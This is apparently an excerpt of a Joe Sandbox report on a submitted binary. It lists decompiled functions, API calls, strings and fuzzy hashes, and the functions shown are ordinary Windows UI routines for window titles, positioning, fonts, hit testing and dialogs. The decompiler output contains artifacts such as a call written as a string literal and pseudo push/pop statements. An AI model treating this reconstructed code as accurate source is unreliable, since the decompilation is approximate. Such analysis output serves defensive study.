SystemParametersInfoA.USER32(00000068,00000000,00439C90,00000000), ref: 0041ACD6

Strings

MSH_SCROLL_LINES_MSG, xrefs: 0041ABD6
Magellan MSWHEEL, xrefs: 0041AC8E
Control Panel\Desktop, xrefs: 0041AC14
MouseZ, xrefs: 0041AC93
WheelScrollLines, xrefs: 0041AC43

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: MessageWindow$CloseFindInfoOpenParametersQueryRegisterSendSystemValue
String ID: Control Panel\Desktop$MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ$WheelScrollLines
API String ID: 1228133072-821443377
Opcode ID: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction ID: 5c83e38d2889ea35cb43268cbe58cad34713885164d32870b4297f9966653a84
Opcode Fuzzy Hash: 95f70896755e55a52fc01f3e5765352c2d6134ba5801c03a0d6e533f6f354ec8
Instruction Fuzzy Hash: B0216F70A45214ABDB309B51EC49AEB3BB8FB00744F506026E405D2260EBB85DD5DFDE

Uniqueness

Uniqueness Score: -1.00%

Function 00421F4E, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 73
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00421F4E(void* __ecx, CHAR* _a4) {
				char _v520;
				intOrPtr _t36;
				intOrPtr _t45;
				void* _t55;
				void* _t56;

				_t55 = __ecx;
				if((E00416528(__ecx) & 0x00000040) == 0) {
					lstrcpyA( &_v520,  *(__ecx + 0xac));
					if(_a4 != 0) {
						lstrcatA( &_v520, " - ");
						lstrcatA( &_v520, _a4);
						_t36 =  *((intOrPtr*)(_t55 + 0x40));
						if(_t36 > 0) {
							_push(_t36);
							wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
						}
					}
					L9:
					return E0041A843( *((intOrPtr*)(_t55 + 0x1c)),  &_v520);
				}
				_v520 = _v520 & 0x00000000;
				if(_a4 == 0) {
					L5:
					lstrcatA( &_v520,  *(_t55 + 0xac));
					goto L9;
				}
				lstrcpyA( &_v520, _a4);
				_t45 =  *((intOrPtr*)(_t55 + 0x40));
				if(_t45 > 0) {
					_push(_t45);
					wsprintfA(_t56 + lstrlenA( &_v520) - 0x204, ":%d");
				}
				lstrcatA( &_v520, " - ");
				goto L5;
			}

0x00421f59
0x00421f63
0x00421fdf
0x00421fe9
0x00421ffd
0x00422009
0x0042200b
0x00422010
0x00422012
0x0042202d
0x00422033
0x00422010
0x00422036
0x00422048
0x00422048
0x00421f65
0x00421f76
0x00421fc1
0x00421fce
0x00000000
0x00421fce
0x00421f82
0x00421f88
0x00421f8d
0x00421f8f
0x00421faa
0x00421fb0
0x00421fbf
0x00000000

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

lstrcpyA.KERNEL32(00000000,00000000), ref: 00421F82
lstrlenA.KERNEL32(00000000,:%d,?), ref: 00421F9C
wsprintfA.USER32 ref: 00421FAA
lstrcatA.KERNEL32(00000000, - ), ref: 00421FBF
lstrcatA.KERNEL32(00000000,?), ref: 00421FCE
lstrcpyA.KERNEL32(?,?), ref: 00421FDF
lstrcatA.KERNEL32(?, - ), ref: 00421FFD
lstrcatA.KERNEL32(?,00000000), ref: 00422009
lstrlenA.KERNEL32(?,:%d,?), ref: 0042201F
wsprintfA.USER32 ref: 0042202D

Strings

- , xrefs: 00421FB9, 00421FF7
:%d, xrefs: 00421F96, 00422019

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlenwsprintf$LongWindow
String ID: - $:%d
API String ID: 3078587954-2359489159
Opcode ID: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction ID: ae4adf689d7d90f23104f1149d1543740a665fba2c23219458a983a253b49f06
Opcode Fuzzy Hash: 6d21e6e38d927462feef01ef09ad18ff503edbabfb763a1af246d99f2b2f3c6b
Instruction Fuzzy Hash: 5A2123B1A0031EEBCB20ABA5ED4DF8A77ACEF40344F5044A6E615D2151D778E645CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00415B0F, Relevance: 19.7, APIs: 13, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00415B0F(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v5;
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				intOrPtr _t55;
				struct HWND__* _t56;
				intOrPtr _t78;
				intOrPtr _t90;
				signed int _t99;
				struct HWND__* _t100;
				struct HWND__* _t102;
				void* _t104;
				long _t110;
				void* _t113;
				struct HWND__* _t115;
				void* _t117;
				intOrPtr _t119;
				intOrPtr _t123;

				_t113 = __edx;
				_t119 = __ecx;
				_v12 = __ecx;
				_v8 = E00416528(__ecx);
				_t55 = _a4;
				if(_t55 == 0) {
					if((_v5 & 0x00000040) == 0) {
						_t56 = GetWindow( *(__ecx + 0x1c), 4);
					} else {
						_t56 = GetParent( *(__ecx + 0x1c));
					}
					_t115 = _t56;
					if(_t115 != 0) {
						_t100 = SendMessageA(_t115, 0x36b, 0, 0);
						if(_t100 != 0) {
							_t115 = _t100;
						}
					}
				} else {
					_t115 =  *(_t55 + 0x1c);
				}
				GetWindowRect( *(_t119 + 0x1c),  &_v44);
				if((_v5 & 0x00000040) != 0) {
					_t102 = GetParent( *(_t119 + 0x1c));
					GetClientRect(_t102,  &_v28);
					GetClientRect(_t115,  &_v60);
					MapWindowPoints(_t115, _t102,  &_v60, 2);
				} else {
					if(_t115 != 0) {
						_t99 = GetWindowLongA(_t115, 0xfffffff0);
						if((_t99 & 0x10000000) == 0 || (_t99 & 0x20000000) != 0) {
							_t115 = 0;
						}
					}
					_v100 = 0x28;
					if(_t115 != 0) {
						GetWindowRect(_t115,  &_v60);
						E00404F6B(E00404F00(_t115, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t90 = E00404DAE();
						if(_t90 != 0) {
							_t90 =  *((intOrPtr*)(_t90 + 0x1c));
						}
						E00404F6B(E00404F00(_t90, 1),  &_v100);
						CopyRect( &_v60,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t117 = _v44.right - _v44.left;
				asm("cdq");
				_t104 = _v44.bottom - _v44.top;
				asm("cdq");
				_t114 = _v60.bottom;
				_t110 = (_v60.left + _v60.right - _t113 >> 1) - (_t117 - _t113 >> 1);
				asm("cdq");
				asm("cdq");
				_t123 = (_v60.top + _v60.bottom - _v60.bottom >> 1) - (_t104 - _t114 >> 1);
				if(_t110 >= _v28.left) {
					_t78 = _v28.right;
					if(_t117 + _t110 > _t78) {
						_t110 = _t78 - _v44.right + _v44.left;
					}
				} else {
					_t110 = _v28.left;
				}
				if(_t123 >= _v28.top) {
					if(_t104 + _t123 > _v28.bottom) {
						_t123 = _v44.top - _v44.bottom + _v28.bottom;
					}
				} else {
					_t123 = _v28.top;
				}
				return E0041663D(_v12, 0, _t110, _t123, 0xffffffff, 0xffffffff, 0x15);
			}

0x00415b0f
0x00415b17
0x00415b1a
0x00415b22
0x00415b25
0x00415b2a
0x00415b35
0x00415b47
0x00415b37
0x00415b3a
0x00415b3a
0x00415b4d
0x00415b51
0x00415b5d
0x00415b65
0x00415b67
0x00415b67
0x00415b65
0x00415b2c
0x00415b2c
0x00415b2c
0x00415b76
0x00415b7c
0x00415c1c
0x00415c23
0x00415c2a
0x00415c34
0x00415b82
0x00415b84
0x00415b89
0x00415b94
0x00415b9d
0x00415b9d
0x00415b94
0x00415ba1
0x00415ba8
0x00415be9
0x00415bf8
0x00415c05
0x00415baa
0x00415baa
0x00415bb1
0x00415bb3
0x00415bb3
0x00415bc3
0x00415bd6
0x00415be0
0x00415be0
0x00415ba8
0x00415c45
0x00415c4b
0x00415c4e
0x00415c55
0x00415c58
0x00415c5f
0x00415c66
0x00415c6d
0x00415c74
0x00415c79
0x00415c80
0x00415c87
0x00415c8f
0x00415c8f
0x00415c7b
0x00415c7b
0x00415c7b
0x00415c94
0x00415ca0
0x00415ca8
0x00415ca8
0x00415c96
0x00415c96
0x00415c96
0x00415cc1

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetParent.USER32(?), ref: 00415B3A
SendMessageA.USER32 ref: 00415B5D
GetWindowRect.USER32 ref: 00415B76
GetWindowLongA.USER32 ref: 00415B89
CopyRect.USER32 ref: 00415BD6
CopyRect.USER32 ref: 00415BE0
GetWindowRect.USER32 ref: 00415BE9
CopyRect.USER32 ref: 00415C05

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID:
API String ID: 808654186-0
Opcode ID: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction ID: 84b52a2fdf36364977305fff30e360f87450067914530d6a9d7fdd5b83c17d5a
Opcode Fuzzy Hash: 08e789acf66eab3a19b7e86daab60fd72cfb8a595c4ec189871ddf3cd5da10ba
Instruction Fuzzy Hash: A4517571A04619AFCB10DFA8DC85EEEBBB9AF84314F154125E501F3291D734B9468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00428D7F, Relevance: 19.6, APIs: 13, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00428D7F(intOrPtr* __ecx) {
				struct tagSIZE _v12;
				int _v16;
				struct tagSIZE _v24;
				void* _v28;
				int _v32;
				struct tagLOGFONTA _v92;
				struct tagTEXTMETRICA _v148;
				void* _t64;
				long _t70;
				void* _t79;
				signed int _t83;
				signed int _t84;
				void* _t91;
				int _t117;
				void* _t119;
				void** _t122;

				_t121 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t64 =  *(__ecx + 0x2c);
					if(_t64 == 0) {
						_push(0xe);
						return  *((intOrPtr*)( *__ecx + 0x24))();
					}
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						GetObjectA(_t64, 0x3c,  &_v92);
						GetTextFaceA( *(__ecx + 8), 0x20,  &(_v92.lfFaceName));
						GetTextMetricsA( *(__ecx + 8),  &_v148);
						_t70 = _v148.tmHeight;
						if(_t70 >= 0) {
							_v92.lfHeight = _v148.tmInternalLeading - _t70;
						} else {
							_v92.lfHeight = _t70;
						}
						_v92.lfWidth = _v148.tmAveCharWidth;
						_v92.lfWeight = _v148.tmWeight;
						_v92.lfItalic = _v148.tmItalic;
						_v92.lfUnderline = _v148.tmUnderlined;
						_v92.lfStrikeOut = _v148.tmStruckOut;
						_v92.lfCharSet = _v148.tmCharSet;
						_v92.lfPitchAndFamily = _v148.tmPitchAndFamily;
						_t79 = CreateFontIndirectA( &_v92);
						_v28 = _t79;
						SelectObject( *(_t121 + 4), _t79);
						GetTextMetricsA( *(_t121 + 4),  &_v148);
						_t83 = _v148.tmHeight;
						_t117 =  ~(_v92.lfHeight);
						if(_t83 >= 0) {
							_t84 = _t83 - _v148.tmInternalLeading;
						} else {
							_t84 =  ~_t83;
						}
						_v16 = _t84;
						GetWindowExtEx( *(_t121 + 4),  &_v12);
						GetViewportExtEx( *(_t121 + 4),  &_v24);
						if(_v12.cy < 0) {
							_v12.cy =  ~(_v12.cy);
						}
						if(_v24.cy < 0) {
							_v24.cy =  ~(_v24.cy);
						}
						_v32 = MulDiv(_t117, _v24.cy, _v12.cy);
						if(_v32 >= MulDiv(_v16, _v24.cy, _v12.cy)) {
							_t119 = _v28;
						} else {
							_v92.lfFaceName = _v92.lfFaceName & 0x00000000;
							_v92.lfPitchAndFamily = (_v92.lfPitchAndFamily & 0 | (_v92.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
							_t119 = CreateFontIndirectA( &_v92);
							SelectObject( *(_t121 + 4), _t119);
							DeleteObject(_v28);
						}
						_t122 = _t121 + 0x28;
						_t91 = E0041A89B(_t122);
						 *_t122 = _t119;
						return _t91;
					}
				}
				return _t64;
			}

0x00428d89
0x00428d8f
0x00428d95
0x00428d9a
0x00428d9e
0x00000000
0x00428da0
0x00428dac
0x00428dbb
0x00428dca
0x00428de0
0x00428de2
0x00428dea
0x00428df9
0x00428dec
0x00428dec
0x00428dec
0x00428e05
0x00428e0b
0x00428e11
0x00428e17
0x00428e1d
0x00428e23
0x00428e29
0x00428e30
0x00428e33
0x00428e39
0x00428e49
0x00428e4e
0x00428e54
0x00428e58
0x00428e5e
0x00428e5a
0x00428e5a
0x00428e5a
0x00428e64
0x00428e6e
0x00428e7b
0x00428e85
0x00428e8c
0x00428e8c
0x00428e93
0x00428e9a
0x00428e9a
0x00428eaf
0x00428ebd
0x00428ef1
0x00428ebf
0x00428ec2
0x00428ed1
0x00428eda
0x00428ee0
0x00428ee9
0x00428ee9
0x00428ef4
0x00428ef8
0x00428efd
0x00000000
0x00428f00
0x00428dac
0x00428f03

APIs

GetObjectA.GDI32(?,0000003C,?), ref: 00428DBB
GetTextFaceA.GDI32(00000000,00000020,?), ref: 00428DCA
GetTextMetricsA.GDI32(00000000,?), ref: 00428DE0
CreateFontIndirectA.GDI32(?), ref: 00428E30
SelectObject.GDI32(00000000,00000000), ref: 00428E39
GetTextMetricsA.GDI32(00000000,?), ref: 00428E49
GetWindowExtEx.GDI32(00000000,00000000), ref: 00428E6E
GetViewportExtEx.GDI32(00000000,?), ref: 00428E7B
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EAA
MulDiv.KERNEL32(?,00000000,00000000), ref: 00428EB8
CreateFontIndirectA.GDI32(?), ref: 00428ED8

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Text$CreateFontIndirectMetricsObject$FaceSelectViewportWindow
String ID:
API String ID: 3870699365-0
Opcode ID: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction ID: d30efaf7af162c4076970c06207e774494d4aa7f708cde8adb03360c61ae062c
Opcode Fuzzy Hash: 10801792fbe3792cf5b3815eddb952798c023c596e164af8040c919a982e3b9b
Instruction Fuzzy Hash: 15518531A01299EFCF21CFE8DD44AEEBBB9EF18300F14446AE455A7221D734AA46DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00422E02, Relevance: 18.3, APIs: 12, Instructions: 288
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00422E02(intOrPtr __ecx, struct tagPOINT _a4, intOrPtr _a8) {
				signed char _v6;
				signed int _v7;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v112;
				intOrPtr _t141;
				void* _t144;
				intOrPtr _t145;
				intOrPtr _t148;
				void* _t150;
				signed int _t151;
				void* _t161;
				int _t177;
				void* _t184;
				signed int _t188;
				void* _t190;
				signed int _t194;
				void* _t196;
				void* _t198;
				signed int _t205;
				int _t206;
				void* _t219;
				intOrPtr _t238;
				intOrPtr _t241;
				int _t243;
				signed int _t245;
				signed int _t246;
				int _t251;

				_t241 = __ecx;
				_v16 = __ecx;
				_v8 = E00416528(__ecx);
				GetWindowRect( *(__ecx + 0x1c),  &_v44);
				_t205 = GetSystemMetrics(0x21);
				_v12 = _t205;
				_v28 = GetSystemMetrics(0x20);
				if( *0x439c44 != 0) {
					_t177 = E004136A7(_t241);
					_t251 = _t177;
					_t243 = 2;
					if( *0x439c3c == 0 || (_v7 & 0x00000010) == 0) {
						L6:
						if(_t251 < 0xa || _t251 > 0x11) {
							if(_t251 != 4) {
								goto L17;
							}
							goto L9;
						} else {
							L9:
							if((_v7 & 0x00000008) == 0) {
								InflateRect( &_v44,  ~_v28,  ~_t205);
								if((_v7 & 0x00000002) == 0) {
									L17:
									return _t251;
								}
								_t184 = _t251 - 4;
								if(_t184 == 0) {
									L22:
									_t188 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000004;
									L23:
									return _t188 + 0xb;
								}
								_t190 = _t184 - 9;
								if(_t190 == 0) {
									_t194 = (0 | _a8 - _v44.top >= 0x00000000) - 0x00000001 & _t243;
									L19:
									return _t194 + 0xa;
								}
								_t196 = _t190 - 1;
								if(_t196 == 0) {
									_t188 = 0 | _a8 - _v44.top < 0x00000000;
									goto L23;
								}
								_t198 = _t196 - _t243;
								if(_t198 == 0) {
									_t194 = (0 | _a8 - _v44.bottom <= 0x00000000) - 0x00000001 & 0x00000005;
									goto L19;
								}
								if(_t198 == 1) {
									goto L22;
								}
								goto L17;
							}
							return _t243;
						}
					} else {
						if(_t251 == 3) {
							_t251 = _t243;
						}
						if(GetKeyState(_t243) < 0) {
							L25:
							return 0;
						} else {
							goto L6;
						}
					}
				}
				_push(_a8);
				if(PtInRect( &_v44, _a4.x) == 0) {
					goto L25;
				}
				_t206 = GetSystemMetrics(6);
				_v20 = _t206;
				_t245 = GetSystemMetrics(5);
				_v112.top = _v44.top;
				_v112.left = _v44.left;
				_v112.bottom = _v44.bottom;
				_v112.right = _v44.right;
				_push( &_v112);
				E00422D9C(0);
				CopyRect( &_v60,  &_v112);
				_push(_a8);
				if(PtInRect( &_v60, _a4.x) != 0) {
					_push(1);
					L61:
					_pop(_t144);
					return _t144;
				}
				if((_v8 & 0x00040600) == 0) {
					L56:
					_t141 =  *0x439c9c; // 0x0
					_push(_a8);
					_v44.bottom = _t206 + _t141 + _v44.top;
					if(PtInRect( &_v44, _a4.x) == 0) {
						_push(0xfffffffe);
						goto L61;
					}
					_t145 =  *0x439c98; // 0x0
					if(_a4.x >= _t145 + _v44.left - 2 || (_v6 & 0x00000008) == 0) {
						L54:
						_push(2);
					} else {
						_push(3);
					}
					goto L61;
				}
				_t246 = _v12;
				_t148 =  *0x439c98; // 0x0
				_t150 = _t148 - _t245 + _t245 * 2 + _v28;
				_t219 = _t246 - _t206 + _t206 +  *0x439c9c;
				if(_a8 >= _v44.top + _t246) {
					_t238 = _v44.bottom;
					if(_a8 < _t238 - _t246) {
						_t151 = _v28;
						if(_a4.x >= _v44.left + _t151) {
							if(_a4.x < _v44.right - _t151) {
								InflateRect( &_v44,  ~_t151,  ~_v12);
								_t206 = _v20;
								goto L56;
							}
							if((_v7 & 0x00000002) == 0) {
								if(_a8 > _v44.top + _t219) {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xb;
								} else {
									_push(0xe);
									goto L51;
								}
							} else {
								_push(0xb);
								goto L51;
							}
						} else {
							if((_v7 & 0x00000002) == 0) {
								if(_a8 <= _v44.top + _t219) {
									goto L33;
								} else {
									_t161 = ((0 | _a8 - _t238 - _t219 < 0x00000000) - 0x00000001 & 0x00000006) + 0xa;
								}
							} else {
								_push(0xa);
								goto L51;
							}
						}
					} else {
						if((_v7 & 0x00000002) == 0) {
							if(_a4.x > _v44.left + _t150) {
								_t161 = ((0 | _a4.x - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xf;
							} else {
								_push(0x10);
								goto L51;
							}
						} else {
							_push(0xf);
							goto L51;
						}
					}
				} else {
					if((_v7 & 0x00000002) == 0) {
						if(_a4.x > _v44.left + _t150) {
							_t161 = ((0 | _a4 - _v44.right - _t150 < 0x00000000) - 0x00000001 & 0x00000002) + 0xc;
						} else {
							L33:
							_push(0xd);
							goto L51;
						}
					} else {
						_push(0xc);
						L51:
						_pop(_t161);
					}
				}
				if((_v7 & 0x00000008) != 0) {
					goto L54;
				}
				return _t161;
			}

0x00422e0b
0x00422e0d
0x00422e15
0x00422e1f
0x00422e2f
0x00422e33
0x00422e3f
0x00422e42
0x00422e4a
0x00422e58
0x00422e5a
0x00422e5b
0x00422e7a
0x00422e7d
0x00422e87
0x00000000
0x00000000
0x00000000
0x00422e89
0x00422e89
0x00422e8d
0x00422ea3
0x00422ead
0x00422ec5
0x00000000
0x00422ec5
0x00422eb1
0x00422eb4
0x00422f00
0x00422f0c
0x00422f0f
0x00000000
0x00422f0f
0x00422eb6
0x00422eb9
0x00422efc
0x00422edb
0x00000000
0x00422edb
0x00422ebb
0x00422ebc
0x00422eeb
0x00000000
0x00422eeb
0x00422ebe
0x00422ec0
0x00422ed8
0x00000000
0x00422ed8
0x00422ec3
0x00000000
0x00000000
0x00000000
0x00422ec3
0x00000000
0x00422e8f
0x00422e63
0x00422e66
0x00422e68
0x00422e68
0x00422e74
0x00422f2d
0x00000000
0x00000000
0x00000000
0x00000000
0x00422e74
0x00422e5b
0x00422f17
0x00422f2b
0x00000000
0x00000000
0x00422f38
0x00422f3c
0x00422f41
0x00422f46
0x00422f4c
0x00422f55
0x00422f5b
0x00422f61
0x00422f64
0x00422f71
0x00422f77
0x00422f85
0x00422f87
0x004230f9
0x004230f9
0x00000000
0x004230f9
0x00422f95
0x004230bf
0x004230bf
0x004230c4
0x004230d3
0x004230da
0x004230f7
0x00000000
0x004230f7
0x004230dc
0x004230eb
0x004230a5
0x004230a5
0x004230f3
0x004230f3
0x004230f3
0x00000000
0x004230eb
0x00422f9e
0x00422fa3
0x00422fad
0x00422fb9
0x00422fc4
0x00422ffd
0x00423007
0x0042303a
0x00423042
0x00423073
0x004230b6
0x004230bc
0x00000000
0x004230bc
0x00423079
0x00423087
0x0042309c
0x00423089
0x00423089
0x00000000
0x00423089
0x0042307b
0x0042307b
0x00000000
0x0042307b
0x00423044
0x00423048
0x00423056
0x00000000
0x00423058
0x00423066
0x00423066
0x0042304a
0x0042304a
0x00000000
0x0042304a
0x00423048
0x00423009
0x0042300d
0x0042301b
0x00423032
0x0042301d
0x0042301d
0x00000000
0x0042301d
0x0042300f
0x0042300f
0x00000000
0x0042300f
0x0042300d
0x00422fc6
0x00422fca
0x00422fdb
0x00422ff5
0x00422fdd
0x00422fdd
0x00422fdd
0x00000000
0x00422fdd
0x00422fcc
0x00422fcc
0x0042308b
0x0042308b
0x0042308b
0x00422fca
0x004230a3
0x00000000
0x00000000
0x004230fe

APIs

Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534

GetWindowRect.USER32 ref: 00422E1F
GetSystemMetrics.USER32 ref: 00422E2D
GetSystemMetrics.USER32 ref: 00422E36
GetKeyState.USER32(00000002), ref: 00422E6B
InflateRect.USER32(?,?,00000000), ref: 00422EA3
PtInRect.USER32(?,?,?), ref: 00422F27

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$MetricsSystemWindow$InflateLongState
String ID:
API String ID: 90034188-0
Opcode ID: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction ID: 3d4fded11727fa72cddd390d452a0739f578755c9cf4983628836b576b503de4
Opcode Fuzzy Hash: 4815d690c65c5df91f50d3a0b43a45b49be0c46c8ec28819b598da24b08e638b
Instruction Fuzzy Hash: F4A1D931B00229ABDF14CFA8D945BEE77B1EF08355F55802BE902E7244D7BC9A81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411E32, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00411E32(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t90;
				struct HWND__* _t91;
				intOrPtr* _t142;
				intOrPtr* _t145;
				void* _t147;
				void* _t149;

				_t118 = __ecx;
				E00406520(E00429CDC, _t147);
				_t145 = __ecx;
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x34;
				 *((intOrPtr*)(_t147 - 0x24)) = __ecx;
				if( *(_t147 + 0x10) == 0) {
					 *(_t147 + 0x10) =  *(E00424BFB() + 8);
				}
				_t142 =  *((intOrPtr*)(E00424BFB() + 0x1038));
				 *((intOrPtr*)(_t147 - 0x28)) = _t142;
				 *(_t147 - 0x14) = 0;
				 *(_t147 - 0x18) = 0;
				 *(_t147 - 4) = 0;
				E0041615D(_t118, 0x10);
				E0041615D(_t118, 0x3c000);
				if(_t142 == 0) {
					L5:
					if( *(_t147 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0xc));
						return 0;
					}
					_t81 =  *0x436980; // 0x436994
					 *((intOrPtr*)(_t147 - 0x1c)) = _t81;
					 *(_t147 - 4) = 1;
					 *((intOrPtr*)(_t147 - 0x20)) = 0;
					if((0 | E00416F5E( *(_t147 + 8), _t147 - 0x1c, _t147 - 0x20) == 0x00000000) != 0) {
						L13:
						E00416DAD(_t147 - 0x40,  *(_t147 + 8));
						 *(_t147 - 4) = 2;
						E004170E7(_t147 - 0x40,  *((intOrPtr*)(_t147 - 0x20)));
						 *(_t147 - 0x14) = E00416E4A(_t147 - 0x40);
						 *(_t147 - 4) = 1;
						E00416E3C(_t147 - 0x40);
						if( *(_t147 - 0x14) != 0) {
							 *(_t147 + 8) = GlobalLock( *(_t147 - 0x14));
						}
						L15:
						 *(_t145 + 0x2c) =  *(_t145 + 0x2c) | 0xffffffff;
						 *(_t145 + 0x24) =  *(_t145 + 0x24) | 0x00000010;
						_push(_t145);
						"VWh\rDB"();
						_t90 =  *((intOrPtr*)(_t147 + 0xc));
						if(_t90 != 0) {
							_t91 =  *(_t90 + 0x1c);
						} else {
							_t91 = 0;
						}
						 *(_t147 - 0x18) = CreateDialogIndirectParamA( *(_t147 + 0x10),  *(_t147 + 8), _t91, E00411B77, 0);
						 *(_t147 - 4) = 0;
						E00416AEC(_t147 - 0x1c);
						 *(_t147 - 4) =  *(_t147 - 4) | 0xffffffff;
						if(_t142 != 0) {
							 *((intOrPtr*)( *_t142 + 0x14))(_t147 - 0x34);
							if( *(_t147 - 0x18) != 0) {
								 *((intOrPtr*)( *_t145 + 0xb4))(0);
							}
						}
						if(E00413C3E() == 0) {
							 *((intOrPtr*)( *_t145 + 0xa4))();
						}
						if( *(_t147 - 0x18) != 0 && ( *(_t145 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t147 - 0x18));
							 *(_t147 - 0x18) = 0;
						}
						if( *(_t147 - 0x14) != 0) {
							GlobalUnlock( *(_t147 - 0x14));
							GlobalFree( *(_t147 - 0x14));
						}
						if( *(_t147 - 0x18) != 0 || ( *(_t145 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
					if(GetSystemMetrics(0x2a) == 0 || E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Shell Dlg") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), "MS Sans Serif") != 0 && E0040653F( *((intOrPtr*)(_t147 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t147 - 0x20)) == 8) {
							 *((intOrPtr*)(_t147 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t147 - 0x34);
				if( *((intOrPtr*)( *_t145 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t147 + 8) =  *((intOrPtr*)( *_t142 + 0x10))(_t147 - 0x34,  *(_t147 + 8));
				goto L5;
			}

